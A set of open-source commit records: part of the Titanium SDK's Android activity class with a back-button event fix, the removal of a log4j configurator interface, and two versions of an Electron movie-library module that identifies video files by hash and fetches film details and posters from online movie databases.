interceptOnBackPressedListeners.add(new WeakReference<interceptOnBackPressedEvent>(listener)); } public void addOnActivityResultListener(OnActivityResultEvent listener) { onActivityResultListeners.add(new WeakReference<OnActivityResultEvent>(listener)); } public void addOnCreateOptionsMenuEventListener(OnCreateOptionsMenuEvent listener) { onCreateOptionsMenuListeners.add(new WeakReference<OnCreateOptionsMenuEvent>(listener)); } public void addOnPrepareOptionsMenuEventListener(OnPrepareOptionsMenuEvent listener) { onPrepareOptionsMenuListeners.add(new WeakReference<OnPrepareOptionsMenuEvent>(listener)); } public void removeOnLifecycleEventListener(OnLifecycleEvent listener) { // TODO stub } private void dispatchCallback(String name, KrollDict data) { if (data == null) { data = new KrollDict(); } data.put("source", activityProxy); // TIMOB-19903 if (TiApplication.getInstance().runOnMainThread()) { // We must call this synchornously to ensure it happens before we release the Activity reference on the V8/Native side! activityProxy.callPropertySync(name, new Object[] { data }); } else { // This hopefully finishes before we release the reference on the native side?! I have seen it crash because it didn't before though... // Not sure it's safe to keep this behavior... activityProxy.callPropertyAsync(name, new Object[] { data }); } } private void releaseDialogs(boolean finish) { //clean up dialogs when activity is pausing or finishing for (Iterator<DialogWrapper> iter = dialogs.iterator(); iter.hasNext(); ) { DialogWrapper p = iter.next(); Dialog dialog = p.getDialog(); boolean persistent = p.getPersistent(); //if the activity is pausing but not finishing, clean up dialogs only if //they are non-persistent if (finish || !persistent) { if (dialog != null && dialog.isShowing()) { dialog.dismiss(); } dialogs.remove(p); } } } @Override public void onWindowFocusChanged(boolean hasFocus) { synchronized (windowFocusChangedListeners.synchronizedList()) { for (OnWindowFocusChangedEvent listener : windowFocusChangedListeners.nonNull()) { try { listener.onWindowFocusChanged(hasFocus); } catch (Throwable t) { Log.e(TAG, "Error dispatching onWindowFocusChanged event: " + t.getMessage(), t); } } } super.onWindowFocusChanged(hasFocus); } @Override /** * When this activity pauses, this method sets the current activity to null, fires a javascript 'pause' event, * and if the activity is finishing, remove all dialogs associated with it. 
*/ protected void onPause() { inForeground = false; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_PAUSE, null); } super.onPause(); isResumed = false; Log.d(TAG, "Activity " + this + " onPause", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { releaseDialogs(true); if (!isFinishing()) { finish(); } return; } if (!windowStack.empty()) { windowStack.peek().onWindowFocusChange(false); } TiApplication.updateActivityTransitionState(true); tiApp.setCurrentActivity(this, null); TiUIHelper.showSoftKeyboard(getWindow().getDecorView(), false); if (this.isFinishing()) { releaseDialogs(true); } else { //release non-persistent dialogs when activity hides releaseDialogs(false); } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_PAUSE, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_PAUSE); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } // Checkpoint for ti.background event if (tiApp != null && TiApplication.getInstance().isAnalyticsEnabled()) { analytics.sendAppBackgroundEvent(); } } @Override /** * When the activity resumes, this method updates the current activity to this and fires a javascript * 'resume' event. */ protected void onResume() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_RESUME, null); } super.onResume(); if (isFinishing()) { return; } Log.d(TAG, "Activity " + this + " onResume", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (!windowStack.empty()) { windowStack.peek().onWindowFocusChange(true); } tiApp.setCurrentActivity(this, this); TiApplication.updateActivityTransitionState(false); if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_RESUME, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_RESUME); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } isResumed = true; // Checkpoint for ti.foreground event //String deployType = tiApp.getAppProperties().getString("ti.deploytype", "unknown"); if(TiApplication.getInstance().isAnalyticsEnabled()){ analytics.sendAppForegroundEvent(); } } @Override /** * When this activity starts, this method updates the current activity to this if necessary and * fire javascript 'start' and 'focus' events. Focus events will only fire if * the activity is not a tab activity. */ protected void onStart() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_START, null); } super.onStart(); if (isFinishing()) { return; } // Newer versions of Android appear to turn this on by default. // Turn if off until an activity indicator is shown. setProgressBarIndeterminateVisibility(false); Log.d(TAG, "Activity " + this + " onStart", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } updateTitle(); if (activityProxy != null) { // we only want to set the current activity for good in the resume state but we need it right now. 
// save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); activityProxy.fireEvent(TiC.EVENT_START, null); // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_START); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } // store current configuration orientation // This fixed bug with double orientation chnage firing when activity starts in landscape previousOrientation = getWindowManager().getDefaultDisplay().getRotation(); } @Override /** * When this activity stops, this method fires the javascript 'blur' and 'stop' events. Blur events will only fire * if the activity is not a tab activity. */ protected void onStop() { inForeground = false; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_STOP, null); } super.onStop(); Log.d(TAG, "Activity " + this + " onStop", Log.DEBUG_MODE); if (getTiApp().isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_STOP, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_STOP); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } KrollRuntime.suggestGC(); } @Override /** * When this activity restarts, this method updates the current activity to this and fires javascript 'restart' * event. */ protected void onRestart() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_RESTART, null); } super.onRestart(); Log.d(TAG, "Activity " + this + " onRestart", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); activityProxy.fireEvent(TiC.EVENT_RESTART, null); // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); } } @Override /** * When the activity is about to go into the background as a result of user choice, this method fires the * javascript 'userleavehint' event. */ protected void onUserLeaveHint() { Log.d(TAG, "Activity " + this + " onUserLeaveHint", Log.DEBUG_MODE); if (getTiApp().isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_USER_LEAVE_HINT, null); } super.onUserLeaveHint(); } @Override /** * When this activity is destroyed, this method removes it from the activity stack, performs * clean up, and fires javascript 'destroy' event. 
*/ protected void onDestroy() { Log.d(TAG, "Activity " + this + " onDestroy", Log.DEBUG_MODE); if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_DESTROY, null); } inForeground = false; TiApplication tiApp = getTiApp(); //Clean up dialogs when activity is destroyed. releaseDialogs(true); if (tiApp.isRestartPending()) { super.onDestroy(); if (!isFinishing()) { finish(); } return; } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_DESTROY); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } if (orientationListener != null) { orientationListener.disable(); orientationListener = null; } super.onDestroy(); boolean isFinishing = isFinishing(); // If the activity is finishing, remove the windowId and supportHelperId so the window and supportHelper can be released. // If the activity is forced to destroy by Android OS, keep the windowId and supportHelperId so the activity can be recovered. if (isFinishing) { int windowId = getIntentInt(TiC.INTENT_PROPERTY_WINDOW_ID, -1); TiActivityWindows.removeWindow(windowId); TiActivitySupportHelpers.removeSupportHelper(supportHelperId); } fireOnDestroy(); if (layout instanceof TiCompositeLayout) { Log.d(TAG, "Layout cleanup.", Log.DEBUG_MODE); ((TiCompositeLayout) layout).removeAllViews(); } layout = null; //LW windows if (window == null && view != null) { view.releaseViews(); view.release(); view = null; } if (window != null) { window.closeFromActivity(isFinishing); window.releaseViews(); window.removeAllChildren(); window.release(); window = null; } if (menuHelper != null) { menuHelper.destroy(); menuHelper = null; } if (activityProxy != null) { activityProxy.release(); activityProxy = null; } // Don't dispose the runtime if the activity is forced to destroy by Android, // so we can recover the activity later. KrollRuntime.decrementActivityRefCount(isFinishing); KrollRuntime.suggestGC(); } @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); // If the activity is forced to destroy by Android, save the supportHelperId so // we can get it back when the activity is recovered. 
if (!isFinishing() && supportHelper != null) { outState.putInt("supportHelperId", supportHelperId); } synchronized (instanceStateListeners.synchronizedList()) { for (OnInstanceStateEvent listener : instanceStateListeners.nonNull()) { try { TiLifecycle.fireInstanceStateEvent(outState, listener, TiLifecycle.ON_SAVE_INSTANCE_STATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnInstanceStateEvent: " + t.getMessage(), t); } } } } @Override protected void onRestoreInstanceState(Bundle savedInstanceState) { super.onRestoreInstanceState(savedInstanceState); if (savedInstanceState.containsKey("supportHelperId")) { supportHelperId = savedInstanceState.getInt("supportHelperId"); supportHelper = TiActivitySupportHelpers.retrieveSupportHelper(this, supportHelperId); if (supportHelper == null) { Log.e(TAG, "Unable to retrieve the activity support helper."); } } synchronized (instanceStateListeners.synchronizedList()) { for (OnInstanceStateEvent listener : instanceStateListeners.nonNull()) { try { TiLifecycle.fireInstanceStateEvent(savedInstanceState, listener, TiLifecycle.ON_RESTORE_INSTANCE_STATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnInstanceStateEvent: " + t.getMessage(), t); } } } } // called in order to ensure that the onDestroy call is only acted upon once. // should be called by any subclass protected void fireOnDestroy() { if (!onDestroyFired) { if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_DESTROY, null); } onDestroyFired = true; } } protected boolean shouldFinishRootActivity() { return getIntentBoolean(TiC.INTENT_PROPERTY_FINISH_ROOT, false); } @Override public void finish() { super.finish(); if (shouldFinishRootActivity()) { TiApplication app = getTiApp(); if (app != null) { TiRootActivity rootActivity = app.getRootActivity(); if (rootActivity != null && !(rootActivity.equals(this)) && !rootActivity.isFinishing()) { rootActivity.finish(); } else if (rootActivity == null && !app.isRestartPending()) { // When the root activity has been killed and garbage collected and the app is not scheduled to restart, // we need to force finish the root activity while this activity has an intent to finish root. // This happens when the "Don't keep activities" option is enabled and the user stays in some activity // (eg. heavyweight window, tabgroup) other than the root activity for a while and then he wants to back // out the app. app.setForceFinishRootActivity(true); } } } } // These activityOnXxxx are all used by TiLaunchActivity when // the android bug 2373 is detected and the app is being re-started. // By calling these from inside its on onXxxx handlers, TiLaunchActivity // can avoid calling super.onXxxx (super being TiBaseActivity), which would // result in a bunch of Titanium-specific code running when we don't need it // since we are restarting the app as fast as possible. Calling these methods // allows TiLaunchActivity to fulfill the requirement that the Android built-in // Activity's onXxxx must be called. (Think of these as something like super.super.onXxxx // from inside TiLaunchActivity.) 
protected void activityOnPause() { super.onPause(); } protected void activityOnRestart() { super.onRestart(); } protected void activityOnResume() { super.onResume(); } protected void activityOnStop() { super.onStop(); } protected void activityOnStart() { super.onStart(); } protected void activityOnDestroy() { super.onDestroy(); } public void activityOnCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); } /** * Called by the onCreate methods of TiBaseActivity to determine if an unsupported application * re-launch appears to be occurring. * @param activity The Activity getting the onCreate * @param savedInstanceState The argument passed to the onCreate. A non-null value is a "tell" * that the system is re-starting a killed application. */ public static boolean isUnsupportedReLaunch(Activity activity, Bundle savedInstanceState) { // We have to relaunch the app if // 1. all the activities have been killed and the runtime has been disposed or // 2. the app's hosting process has been killed. In this case, onDestroy or any other method // is not called. We can check the status of the root activity to detect this situation. if (savedInstanceState != null && !(activity instanceof TiLaunchActivity) && (KrollRuntime.isDisposed() || TiApplication.getInstance().rootActivityLatch.getCount() != 0)) { return true; } return false; } }
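The class above also pairs registerPermissionRequestCallback(...) with onRequestPermissionsResult(...), resolving a runtime-permission request back to a KrollFunction by request code. A hedged sketch of how module code might use that pairing follows; the proxy class, permission and request code are illustrative assumptions, and ActivityCompat is the standard Android support-library helper rather than anything defined in this file:

// Sketch: register the Kroll callback first, then issue the permission request with the same
// request code, so TiBaseActivity.onRequestPermissionsResult can deliver a success/error
// KrollDict to the registered callback.
import org.appcelerator.kroll.KrollFunction;
import org.appcelerator.kroll.KrollProxy;
import org.appcelerator.titanium.TiApplication;
import org.appcelerator.titanium.TiBaseActivity;
import android.Manifest;
import android.app.Activity;
import android.support.v4.app.ActivityCompat;

public class HypotheticalCameraProxy extends KrollProxy
{
	private static final int CAMERA_PERMISSION_REQUEST = 100; // illustrative request code

	public void requestCameraPermissions(KrollFunction callback)
	{
		Activity activity = TiApplication.getAppRootOrCurrentActivity();
		// Register the callback so it can be looked up by request code when the result arrives.
		TiBaseActivity.registerPermissionRequestCallback(CAMERA_PERMISSION_REQUEST, callback, getKrollObject());
		ActivityCompat.requestPermissions(activity, new String[] { Manifest.permission.CAMERA },
			CAMERA_PERMISSION_REQUEST);
	}
}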
[TIMOB-24253] Fix androidback event
android/titanium/src/java/org/appcelerator/titanium/TiBaseActivity.java
[TIMOB-24253] Fix androidback event
<ide><path>ndroid/titanium/src/java/org/appcelerator/titanium/TiBaseActivity.java <ide> if (topWindow != null && topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { <ide> topWindow.fireEvent(TiC.EVENT_ANDROID_BACK, null); <ide> } <del> <ide> // Override default Android behavior for "back" press <ide> // if the top window has a callback to handle the event. <ide> if (topWindow != null && topWindow.hasProperty(TiC.PROPERTY_ON_BACK)) { <ide> KrollFunction onBackCallback = (KrollFunction) topWindow.getProperty(TiC.PROPERTY_ON_BACK); <ide> onBackCallback.callAsync(activityProxy.getKrollObject(), new Object[] {}); <del> <del> } else { <add> } <add> if (!topWindow.hasProperty(TiC.PROPERTY_ON_BACK) && !topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { <ide> // there are no parent activities to return to <ide> // override back press to background the activity <ide> // note: 2 since there should always be TiLaunchActivity and TiActivity
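In plain terms, the patch above makes onBackPressed fire the 'androidback' event and the onBack callback independently, and only fall through to the platform default when the top window defines neither. A condensed restatement of that decision is sketched below; it is not the literal patch (it keeps a null guard that the patched condition itself omits) and it assumes it lives inside TiBaseActivity so activityProxy and super.onBackPressed() resolve:

// Sketch of the back-press flow after this change: fire the event and/or callback when present,
// run the default behavior only when the top window declares neither.
private void handleBackPressedSketch(TiWindowProxy topWindow)
{
	if (topWindow != null && topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) {
		topWindow.fireEvent(TiC.EVENT_ANDROID_BACK, null);
	}
	if (topWindow != null && topWindow.hasProperty(TiC.PROPERTY_ON_BACK)) {
		KrollFunction onBackCallback = (KrollFunction) topWindow.getProperty(TiC.PROPERTY_ON_BACK);
		onBackCallback.callAsync(activityProxy.getKrollObject(), new Object[] {});
	}
	if (topWindow == null
		|| (!topWindow.hasProperty(TiC.PROPERTY_ON_BACK) && !topWindow.hasListeners(TiC.EVENT_ANDROID_BACK))) {
		super.onBackPressed(); // default behavior (the existing exitOnClose handling still applies)
	}
}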
Java
apache-2.0
919a2db55bc66dc7442e5eb1ca95ac0875bb3a6c
0
prmsheriff/log4j,MuShiiii/log4j,prmsheriff/log4j,prmsheriff/log4j,prmsheriff/log4j,MuShiiii/log4j,prmsheriff/log4j,qos-ch/reload4j,smathieu/librarian_sample_repo_java,qos-ch/reload4j,MuShiiii/log4j,sreekanthpulagam/log4j,smathieu/librarian_sample_repo_java,sreekanthpulagam/log4j,MuShiiii/log4j,MuShiiii/log4j,sreekanthpulagam/log4j,sreekanthpulagam/log4j,sreekanthpulagam/log4j,qos-ch/reload4j
src/java/org/apache/log4j/spi/PropertyConfiguratorInterface.java
package org.apache.log4j.spi; import java.util.Properties; /** Implemented by classes capable of configuring log4j using Java properties files. @since 0.9.2 @author Anders Kristensen */ public interface PropertyConfiguratorInterface { /** Interprets the specified Properties map and configures log4j accordingly. */ void doConfigure(Properties props); }
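For reference, a class satisfying the interface above only needs to supply doConfigure(Properties). A minimal hypothetical implementation is sketched below; the commit removes this interface in favor of Configurator, so this is purely illustrative and the class name and stub body are assumptions:

package org.apache.log4j.spi;

import java.util.Enumeration;
import java.util.Properties;

// Illustrative stub: walks the property names and echoes the log4j-prefixed entries instead of
// actually configuring the hierarchy.
public class ExamplePropertyConfigurator implements PropertyConfiguratorInterface {
  public void doConfigure(Properties props) {
    for (Enumeration e = props.propertyNames(); e.hasMoreElements();) {
      String key = (String) e.nextElement();
      if (key.startsWith("log4j.")) {
        System.out.println(key + "=" + props.getProperty(key));
      }
    }
  }
}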
Removed PropertyConfiguratorInterface.java as it is replaced by Configurator.java. git-svn-id: a7be136288eb2cd985a15786d66ec039c800a993@308905 13f79535-47bb-0310-9956-ffa450edef68
src/java/org/apache/log4j/spi/PropertyConfiguratorInterface.java
<ide><path>rc/java/org/apache/log4j/spi/PropertyConfiguratorInterface.java <del>package org.apache.log4j.spi; <del> <del>import java.util.Properties; <del> <del>/** <del> Implemented by classes capable of configuring log4j using Java <del> properties files. <del> <del> @since 0.9.2 <del> @author Anders Kristensen <del> */ <del>public interface PropertyConfiguratorInterface { <del> /** <del> Interprets the specified Properties map and configures <del> log4j accordingly. <del> */ <del> void doConfigure(Properties props); <del>}
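The commit message in the record above states that PropertyConfiguratorInterface.java was removed because it is replaced by Configurator.java, but the replacing interface itself is not part of this record. As a point of reference only, here is a minimal sketch of the Configurator contract as it appears in later log4j 1.2.x / reload4j releases; the exact signature at this early revision is an assumption, since only the removed file is included in the diff.

package org.apache.log4j.spi;

import java.net.URL;

/**
 * Sketch of the configurator contract that superseded
 * PropertyConfiguratorInterface: instead of interpreting a Properties map,
 * configuration is driven from a URL against a logger repository.
 * Signature taken from later log4j 1.2.x; assumed, not taken from this record.
 */
public interface Configurator {
    void doConfigure(URL url, LoggerRepository repository);
}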
JavaScript
cc0-1.0
6da3f10bbc5e464141fd3fd57f943294456dc31c
0
shrihari/moviemonkey,shrihari/moviemonkey
const remote = require('electron').remote; const app = remote.app; const path = require('path'); const forEachAsync = require('forEachAsync').forEachAsync; const omdbapi = require('omdbapi'); const tmdb = new (require('tmdbapi'))({ apiv3: '5d357768816b32bc2a1f43a06b62cf4c' }); const img_dl = require('image-downloader'); var libhash = require('opensubtitles-api/lib/hash.js'); var OS = require('opensubtitles-api'); var OpenSubtitles = new OS({ useragent:'Movie Monkey v2', username: '', password: '', ssl: true }); var tmdb_config = {}; // Swap this for formatList var toArray = function(o) { return Object.keys(o).map(k => o[k]) } export default class MovieMonkey { constructor(a, db) { this.app = a; this.movies_db = db; this.hashList = [], this.fileList = [], this.bytesizeList = []; this.movies = [], this.unidentified = []; tmdb.configuration() .then((res) => { tmdb_config = res['images']; }).catch(console.error); } insertIntoDB(hash, movie, tmovie, done) { let t = this; t.app.setState({status: {mode: 1, message: "�� Adding "+movie.title}}); t.movies_db.insert({ tmdb_id: tmovie['id'], poster_path: tmovie['poster_path'], backdrop_path: tmovie['backdrop_path'], hash: hash, fileName: t.fileList[t.hashList.indexOf(hash)], bytesize: t.bytesizeList[t.hashList.indexOf(hash)], imdbid: movie.imdbid, imdbrating: +movie.imdbrating, imdbvotes: +movie.imdbvotes.match(/\d/g).join(''), actors: (movie.actors) ? toArray(movie.actors) : null, awards: movie.awards, boxoffice: movie.boxoffice, country: (movie.country) ? toArray(movie.country) : null, directors: (movie.director) ? toArray(movie.director) : null, dvd: movie.dvd, genres: (movie.genre) ? toArray(movie.genre) : null, language: movie.language.split(', '), plot: movie.plot, production: movie.production, rated: movie.rated, released: new Date(movie.released), runtime: +movie.runtime.split(" min")[0], title: movie.title, type: "movie", writers: (movie.writer) ? 
toArray(movie.writer) : null, year: +movie.year, // rotten: movie.ratings[1].value.split("%")[0], metacritic: movie.metascore, }, function(err, newDoc) { // Update any new genres newDoc.genres.forEach(function(genre){ if(t.app.state.allgenres.indexOf(genre) == -1) { t.app.state.allgenres.push(genre); t.app.state.allgenres.sort(); t.app.setState({allgenres: t.app.state.allgenres}); } }); t.app.setState({status: {mode: 1, message: "�� Added "+movie.title}}); // Brag to the user t.app.handleChange({}); done(); }); } downloadBackdrop(hash, movie, tmovie, done) { let t = this; this.app.setState({status: {mode: 1, message: "Downloading backdrop for "+movie.title}}); let tbackdrop = tmdb_config['base_url'] + "original" + tmovie['backdrop_path']; img_dl({ url: tbackdrop, dest: path.join(app.getPath('userData'), 'backdrops'), done: function(e, f, i) { t.insertIntoDB(hash, movie, tmovie, done); } }); } downloadPoster(hash, movie, tmovie, done) { let t = this; // Get poster and backdrop urls let tposter = tmdb_config['base_url'] + "w500" + tmovie['poster_path']; img_dl({ url: tposter, dest: path.join(app.getPath('userData'), 'posters'), done: function(e, f, i) { t.downloadBackdrop(hash, movie, tmovie, done); } }); } getTMDbDetails(hash, movie, done) { let t = this; tmdb.find({external_id: movie.imdbid, external_source: 'imdb_id' }).then(function(res) { let tmovie = res.movie_results[0]; t.app.setState({status: {mode: 1, message: "Downloading poster for "+movie.title}}); t.downloadPoster(hash, movie, tmovie, done); }).catch(console.error); } getOMDbDetails(hash, imdbid, done) { let t = this; omdbapi.get({id: imdbid}).then(function(movie) { if(movie.type == 'movie') { t.app.setState({status: {mode: 1, message: "Fetching poster and backdrop of "+movie.title}}); t.getTMDbDetails(hash, movie, done); } else { done(); } }).catch(console.error); } checkInDB(hash, imdbid, done) { let t = this; this.movies_db.find({imdbid: imdbid}).exec(function(err, docs){ if(docs.length > 0) { // Add the bigger file let movie = docs[0]; let bs = t.bytesizeList[t.hashList.indexOf(hash)]; console.log("Movie already exists, update db", movie.title); console.log(movie.bytesize, bs); if(bs > movie.bytesize) { t.movies_db.update( {imdbid: imdbid}, {$set: { hash: hash, fileName: t.fileList[t.hashList.indexOf(hash)], bytesize: t.bytesizeList[t.hashList.indexOf(hash)] } }, {}, function(e, n) { console.log("updated"); done(); }); } else done(); } else { t.getOMDbDetails(hash, imdbid, done); } }); } addMovies() { let t = this; forEachAsync(this.movies, function(next, OSObject, index, array) { if(OSObject['MovieKind'] != 'movie') { next(); return; } t.app.setState({status: {mode: 1, message: "Processing "+OSObject['MovieName']}}); t.checkInDB(OSObject['MovieHash'], "tt"+OSObject['MovieImdbID'], next); }).then(function() { t.app.setState({status: {mode: 0, message: ""}}); console.log("Phew everything is done"); t.unidentified.forEach(function(movie_hash){ console.log(movie_hash, t.fileList[t.hashList.indexOf(movie_hash)]); }); // addUnidentified() }); } osCheckMovieHash(token) { let hlists = [], h = this.hashList.slice(), t = this; while(h.length) { hlists.push(h.splice(0, 200)); } this.app.setState({status: {mode: 1, message: "Identifying your movies..."}}); forEachAsync(hlists, function(next, hlist, index, array) { OpenSubtitles.api.CheckMovieHash(token, hlist).then( (movies_result) => { console.log(movies_result); let r = movies_result['data']; // Convert ugly object into pretty array for (var key in r) { // if (r.hasOwnProperty(key)) 
if (r[key].hasOwnProperty('MovieHash')) { t.movies.push(r[key]); } else { t.unidentified.push(key); } } next(); }).catch(console.error); // Check hash error }).then(function(){ t.addMovies(); }); } osLogin() { let t = this; this.app.setState({status: {mode: 1, message: "Contacting OpenSubtitles.org server..."}}); // Login to OSDb OpenSubtitles.api.LogIn("", "", "en", "Movie Monkey v1").then((result) => { t.osCheckMovieHash(result['token']); }).catch(console.error); } processFiles(fl) { let t = this; this.fileList = fl.slice(); forEachAsync(fl, function(next, fileName, index, array) { // Calculate Hash and Bytesize of video files t.movies_db.find({fileName: fileName}).exec(function(err, docs) { if(docs.length == 0) { t.app.setState({status: {mode: 1, message: "Processing "+fileName}}); libhash.computeHash( fileName ).then(function(infos){ t.hashList.push(infos['moviehash']); t.bytesizeList.push(infos['moviebytesize']); next(); }); } else { t.fileList.splice(t.fileList.indexOf(fileName), 1); next(); } }); }).then(function(){ // Opensubtitles Login t.osLogin(); }); } }
app/core/moviemonkey.js
const remote = require('electron').remote; const app = remote.app; const path = require('path'); const forEachAsync = require('forEachAsync').forEachAsync; const omdbapi = require('omdbapi'); const tmdb = new (require('tmdbapi'))({ apiv3: '5d357768816b32bc2a1f43a06b62cf4c' }); const img_dl = require('image-downloader'); var libhash = require('opensubtitles-api/lib/hash.js'); var OS = require('opensubtitles-api'); var OpenSubtitles = new OS({ useragent:'Movie Monkey v2', username: '', password: '', ssl: true }); var tmdb_config = {}; // Swap this for formatList var toArray = function(o) { return Object.keys(o).map(k => o[k]) } export default class MovieMonkey { constructor(a, db) { this.app = a; this.movies_db = db; this.hashList = [], this.fileList = [], this.bytesizeList = []; this.movies = [], this.unidentified = []; tmdb.configuration() .then((res) => { tmdb_config = res['images']; }); } insertIntoDB(hash, movie, tmovie, done) { let t = this; t.app.setState({status: {mode: 1, message: "�� Adding "+movie.title}}); t.movies_db.insert({ tmdb_id: tmovie['id'], poster_path: tmovie['poster_path'], backdrop_path: tmovie['backdrop_path'], hash: hash, fileName: t.fileList[t.hashList.indexOf(hash)], bytesize: t.bytesizeList[t.hashList.indexOf(hash)], imdbid: movie.imdbid, imdbrating: +movie.imdbrating, imdbvotes: +movie.imdbvotes.match(/\d/g).join(''), actors: (movie.actors) ? toArray(movie.actors) : null, awards: movie.awards, boxoffice: movie.boxoffice, country: (movie.country) ? toArray(movie.country) : null, directors: (movie.director) ? toArray(movie.director) : null, dvd: movie.dvd, genres: (movie.genre) ? toArray(movie.genre) : null, language: movie.language.split(', '), plot: movie.plot, production: movie.production, rated: movie.rated, released: new Date(movie.released), runtime: +movie.runtime.split(" min")[0], title: movie.title, type: "movie", writers: (movie.writer) ? 
toArray(movie.writer) : null, year: +movie.year, // rotten: movie.ratings[1].value.split("%")[0], metacritic: movie.metascore, }, function(err, newDoc) { // Update any new genres newDoc.genres.forEach(function(genre){ if(t.app.state.allgenres.indexOf(genre) == -1) { t.app.state.allgenres.push(genre); t.app.state.allgenres.sort(); t.app.setState({allgenres: t.app.state.allgenres}); } }); t.app.setState({status: {mode: 1, message: "�� Added "+movie.title}}); // Brag to the user t.app.handleChange({}); done(); }); } downloadBackdrop(hash, movie, tmovie, done) { let t = this; this.app.setState({status: {mode: 1, message: "Downloading backdrop for "+movie.title}}); let tbackdrop = tmdb_config['base_url'] + "original" + tmovie['backdrop_path']; img_dl({ url: tbackdrop, dest: path.join(app.getPath('userData'), 'backdrops'), done: function(e, f, i) { t.insertIntoDB(hash, movie, tmovie, done); } }); } downloadPoster(hash, movie, tmovie, done) { let t = this; // Get poster and backdrop urls let tposter = tmdb_config['base_url'] + "w500" + tmovie['poster_path']; img_dl({ url: tposter, dest: path.join(app.getPath('userData'), 'posters'), done: function(e, f, i) { t.downloadBackdrop(hash, movie, tmovie, done); } }); } getTMDbDetails(hash, movie, done) { let t = this; tmdb.find({external_id: movie.imdbid, external_source: 'imdb_id' }).then(function(res) { let tmovie = res.movie_results[0]; t.app.setState({status: {mode: 1, message: "Downloading poster for "+movie.title}}); t.downloadPoster(hash, movie, tmovie, done); }).catch(console.error); } getOMDbDetails(hash, imdbid, done) { let t = this; omdbapi.get({id: imdbid}).then(function(movie) { if(movie.type == 'movie') { t.app.setState({status: {mode: 1, message: "Fetching poster and backdrop of "+movie.title}}); t.getTMDbDetails(hash, movie, done); } else { done(); } }).catch(console.error); } checkInDB(hash, imdbid, done) { let t = this; this.movies_db.find({imdbid: imdbid}).exec(function(err, docs){ if(docs.length > 0) { // Add the bigger file } else { t.getOMDbDetails(hash, imdbid, done); } }); } addMovies() { let t = this; forEachAsync(this.movies, function(next, OSObject, index, array) { if(OSObject['MovieKind'] != 'movie') { next(); return; } t.app.setState({status: {mode: 1, message: "Processing "+OSObject['MovieName']}}); t.checkInDB(OSObject['MovieHash'], "tt"+OSObject['MovieImdbID'], next); }).then(function() { t.app.setState({status: {mode: 0, message: ""}}); console.log("Phew everything is done"); t.unidentified.forEach(function(movie_hash){ console.log(movie_hash, t.fileList[t.hashList.indexOf(movie_hash)]); }); // addUnidentified() }); } osCheckMovieHash(token) { let hlists = [], h = this.hashList.slice(), t = this; while(h.length) { hlists.push(h.splice(0, 200)); } this.app.setState({status: {mode: 1, message: "Identifying your movies..."}}); forEachAsync(hlists, function(next, hlist, index, array) { OpenSubtitles.api.CheckMovieHash(token, hlist).then( (movies_result) => { console.log(movies_result); let r = movies_result['data']; // Convert ugly object into pretty array for (var key in r) { // if (r.hasOwnProperty(key)) if (r[key].hasOwnProperty('MovieHash')) { t.movies.push(r[key]); } else { t.unidentified.push(key); } } next(); }).catch(console.error); // Check hash error }).then(function(){ t.addMovies(); }); } 